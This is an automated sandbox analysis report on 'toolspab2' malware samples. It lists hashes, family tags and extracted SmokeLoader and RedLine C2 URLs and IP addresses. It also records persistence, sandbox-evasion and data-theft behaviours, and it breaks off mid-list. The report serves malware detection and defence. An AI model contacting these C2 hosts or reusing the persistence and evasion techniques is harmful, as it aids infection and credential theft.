Overview
overview
10Static
static
toolspab2 (1).exe
windows7_x64
10toolspab2 (1).exe
windows10_x64
10toolspab2 (10).exe
windows7_x64
10toolspab2 (10).exe
windows10_x64
10toolspab2 (11).exe
windows7_x64
10toolspab2 (11).exe
windows10_x64
10toolspab2 (12).exe
windows7_x64
10toolspab2 (12).exe
windows10_x64
10toolspab2 (13).exe
windows7_x64
10toolspab2 (13).exe
windows10_x64
10toolspab2 (14).exe
windows7_x64
10toolspab2 (14).exe
windows10_x64
10toolspab2 (15).exe
windows7_x64
10toolspab2 (15).exe
windows10_x64
10toolspab2 (16).exe
windows7_x64
10toolspab2 (16).exe
windows10_x64
10toolspab2 (17).exe
windows7_x64
10toolspab2 (17).exe
windows10_x64
10toolspab2 (18).exe
windows7_x64
10toolspab2 (18).exe
windows10_x64
10toolspab2 (19).exe
windows7_x64
10toolspab2 (19).exe
windows10_x64
10toolspab2 (2).exe
windows7_x64
10toolspab2 (2).exe
windows10_x64
10toolspab2 (20).exe
windows7_x64
10toolspab2 (20).exe
windows10_x64
10toolspab2 (21).exe
windows7_x64
10toolspab2 (21).exe
windows10_x64
10toolspab2 (22).exe
windows7_x64
10toolspab2 (22).exe
windows10_x64
10toolspab2 (23).exe
windows7_x64
10toolspab2 (23).exe
windows10_x64
10Resubmissions
12-07-2021 16:55
210712-cvz622xsbj 1010-07-2021 13:25
210710-pdfh7kft96 1009-07-2021 23:00
210709-hewxkm1xlj 1009-07-2021 16:08
210709-5ql27kyjqa 1009-07-2021 14:08
210709-pt977a4bhe 1008-07-2021 22:09
210708-3ypfnj5j7x 1008-07-2021 13:30
210708-4hsk7y9f2x 1008-07-2021 12:14
210708-8t5f9z9egj 10Analysis
-
max time kernel
1801s -
max time network
1801s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
09-07-2021 14:08
Static task
static1
Behavioral task
behavioral1
Sample
toolspab2 (1).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarsvidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
toolspab2 (1).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseeytmaloybackdoordropperevasioninfostealerloaderpersistencestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
toolspab2 (10).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
toolspab2 (10).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
toolspab2 (11).exe
Resource
win7v20210408
gluptebametasploitredlinesmokeloadersocelarsvidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
toolspab2 (11).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
toolspab2 (12).exe
Resource
win7v20210408
redlinesmokeloadersocelars1ytmaloybackdoordiscoveryevasioninfostealerpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
toolspab2 (12).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
toolspab2 (13).exe
Resource
win7v20210410
gluptebagozi_rm3metasploitredlinesmokeloadersocelars202106221ytmaloybackdoorbankerdiscoverydropperevasioninfostealerloaderpersistencespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
toolspab2 (13).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral11
Sample
toolspab2 (14).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral12
Sample
toolspab2 (14).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral13
Sample
toolspab2 (15).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral14
Sample
toolspab2 (15).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral15
Sample
toolspab2 (16).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarstofseexmrig1ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistencespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral16
Sample
toolspab2 (16).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral17
Sample
toolspab2 (17).exe
Resource
win7v20210408
gluptebametasploitredlinesmokeloadersocelarsvidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral18
Sample
toolspab2 (17).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral19
Sample
toolspab2 (18).exe
Resource
win7v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral20
Sample
toolspab2 (18).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral21
Sample
toolspab2 (19).exe
Resource
win7v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral22
Sample
toolspab2 (19).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseexmrigytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistencespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral23
Sample
toolspab2 (2).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarsvidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral24
Sample
toolspab2 (2).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral25
Sample
toolspab2 (20).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarsytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistencespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral26
Sample
toolspab2 (20).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral27
Sample
toolspab2 (21).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarsvidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral28
Sample
toolspab2 (21).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarstofseexmrigytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistencespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral29
Sample
toolspab2 (22).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarsvidar1517backdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral30
Sample
toolspab2 (22).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarstofseevidar1517ytmaloybackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral31
Sample
toolspab2 (23).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadersocelarsvidar1517backdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral32
Sample
toolspab2 (23).exe
Resource
win10v20210410
gluptebametasploitredlinesmokeloadersocelarstofseevidarxmrig517ytmaloybackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealertrojan
windows10_x64
0 signatures
0 seconds
General
-
Target
toolspab2 (20).exe
-
Size
315KB
-
MD5
585c257e0b345b762e7cdc407d8f9da2
-
SHA1
ffee403d97b76c3460fc166b9d5ce1205cd216a5
-
SHA256
4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6
-
SHA512
14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
http://nusurtal4f.net/
http://netomishnetojuk.net/
http://escalivrouter.net/
http://nick22doom4.net/
http://wrioshtivsio.su/
http://nusotiso4.su/
http://rickkhtovkka.biz/
http://palisotoliso.net/
rc4.i32
rc4.i32
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
YTMaloy
C2
87.251.71.125:80
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
C2
82.202.161.37:26317
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral25/memory/1720-187-0x00000000029F0000-0x0000000003316000-memory.dmp family_glupteba behavioral25/memory/1720-189-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral25/memory/1732-108-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral25/memory/1732-109-0x0000000000417E96-mapping.dmp family_redline behavioral25/memory/1732-111-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral25/memory/2104-255-0x0000000000510000-0x000000000052B000-memory.dmp family_redline behavioral25/memory/2104-256-0x0000000001E50000-0x0000000001E69000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral25/files/0x0007000000013110-233.dat family_socelars -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 134 Vaporeondè_éçè_)))_.exe -
Executes dropped EXE 35 IoCs
pid Process 268 EA30.exe 1184 EC91.exe 1300 11BE.exe 1920 177A.exe 1700 591C.exe 1732 591C.exe 296 F4A1.exe 1464 U1PwSASbnJZ1Nt2.eXE 1600 1AC7.exe 1072 1AC7.tmp 1720 27B3.exe 1196 27B3.exe 1288 134 Vaporeondè_éçè_)))_.exe 892 irecord.exe 1620 irecord.tmp 2040 Sepypitiqy.exe 1176 Mejaelaelolae.exe 1756 I-Record.exe 856 8187.exe 2104 8C32.exe 2224 htwccub 2536 tjwccub 2160 htwccub 1264 toolspab1.exe 2608 toolspab1.exe 2864 tjwccub 1592 htwccub 3028 htwccub 2132 tjwccub 2280 htwccub 2496 htwccub 2840 E0B9.exe 2936 E230.exe 2632 0~NM~WIL.eXe 2488 E618.exe -
Deletes itself 1 IoCs
pid Process 1356 Process not Found -
Loads dropped DLL 32 IoCs
pid Process 812 toolspab2 (20).exe 1920 177A.exe 1700 591C.exe 1848 cmd.exe 632 regsvr32.exe 1600 1AC7.exe 1072 1AC7.tmp 1072 1AC7.tmp 1072 1AC7.tmp 1072 1AC7.tmp 892 irecord.exe 1620 irecord.tmp 1620 irecord.tmp 1620 irecord.tmp 1620 irecord.tmp 1620 irecord.tmp 1756 I-Record.exe 1756 I-Record.exe 1756 I-Record.exe 1756 I-Record.exe 1756 I-Record.exe 1756 I-Record.exe 1756 I-Record.exe 2160 htwccub 1264 toolspab1.exe 2536 tjwccub 3028 htwccub 2864 tjwccub 2496 htwccub 2132 tjwccub 2544 cmd.exe 856 regsvr32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Saxaelupika.exe\"" 134 Vaporeondè_éçè_)))_.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 632 regsvr32.exe 856 regsvr32.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 452 set thread context of 812 452 toolspab2 (20).exe 29 PID 1700 set thread context of 1732 1700 591C.exe 38 PID 2224 set thread context of 2160 2224 htwccub 94 PID 1264 set thread context of 2608 1264 toolspab1.exe 98 PID 1592 set thread context of 3028 1592 htwccub 109 PID 2280 set thread context of 2496 2280 htwccub 122 -
Drops file in Program Files directory 30 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\i-record\unins000.dat irecord.tmp File opened for modification C:\Program Files (x86)\i-record\I-Record.exe irecord.tmp File opened for modification C:\Program Files (x86)\i-record\swscale-2.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avdevice-53.dll irecord.tmp File created C:\Program Files (x86)\i-record\unins000.dat irecord.tmp File created C:\Program Files (x86)\i-record\is-31QED.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-0MDIQ.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-A30AT.tmp irecord.tmp File created C:\Program Files (x86)\Windows Mail\Saxaelupika.exe 134 Vaporeondè_éçè_)))_.exe File created C:\Program Files (x86)\i-record\is-F5OK5.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-VH0DH.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avformat-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\postproc-52.dll irecord.tmp File created C:\Program Files (x86)\i-record\is-03SAB.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-HGTCT.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-RE3BM.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll irecord.tmp File created C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe 134 Vaporeondè_éçè_)))_.exe File opened for modification C:\Program Files (x86)\i-record\avcodec-53.dll irecord.tmp File created C:\Program Files (x86)\i-record\is-IU6FF.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-H0DA8.tmp irecord.tmp File created C:\Program Files (x86)\i-record\is-2E9IE.tmp irecord.tmp File opened for modification C:\Program Files (x86)\i-record\AForge.Video.dll irecord.tmp File created C:\Program Files (x86)\i-record\is-A9E70.tmp irecord.tmp File created C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe.config 134 Vaporeondè_éçè_)))_.exe File opened for modification C:\Program Files (x86)\i-record\avfilter-2.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avutil-51.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\swresample-0.dll irecord.tmp File created C:\Program Files (x86)\Windows Mail\Saxaelupika.exe.config 134 Vaporeondè_éçè_)))_.exe File created C:\Program Files (x86)\i-record\is-V9HMT.tmp irecord.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 24 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 177A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 177A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 177A.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI htwccub Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tjwccub -
Kills process with taskkill 3 IoCs
pid Process 1624 taskkill.exe 2428 taskkill.exe 2464 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online\Total = "0" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\acnav.online IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.acnav.online\ = "18" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a711518ddc9c5f45addff4594541b81f00000000020000000000106600000001000020000000ca49c8e3f2f85fe1bd128013aa83e73c3e60e3b132527f3c5e938dbd80883331000000000e800000000200002000000060db45611d9b8b98f2139acbcefeb6f47d21b3cdd7fee087706401e6f2b0edcd20000000c73bde51819d7fd09a55298ab50e29c033ebd1744296a375b719802c1c1033c940000000b53cac5866951ef0c11550c862e75811f4818094dfa60535549f10f05e81a72cfeda84f9ea257e8cddadf24b7fd4f9b052f1f468ffcc31b91e57ed61ae033164 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a711518ddc9c5f45addff4594541b81f000000000200000000001066000000010000200000004ad62988478e4d64906ba15288ee7a00a8372110c2145aa48265635bcbb1b58d000000000e8000000002000020000000be1fbb6e98842af5924e67252929a8cafa7dd9328be6194f5820014149613799900000004d3b9036bd006417f7c3afa0a2695365eecb66017f2a61d713d496dec186ab2680505ef809899b2e723ee3c93a59b96c8cf55fd1c5cbd9e6d83e22e8ce6d450a5a1fd056c9f6b1fffcd469f3234eb5716087c94ab2bfcff5c186f45a4aee7adf9b397cbc0c443cef3fb6e2b41445388f4d1f9fbeee1517cd446769913f015f7270b1d6579ce25997fa0b7f653024655f4000000038706973a838783083f0e717e87cae34399ba45e75a840b0a8faa0fe4cf14e6a442dfb671b4f9a32db56364a9f318e7f186f1fbe30b912293e9cc7b6a89f0f87 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "18" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.acnav.online\ = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.acnav.online IEXPLORE.EXE Key created 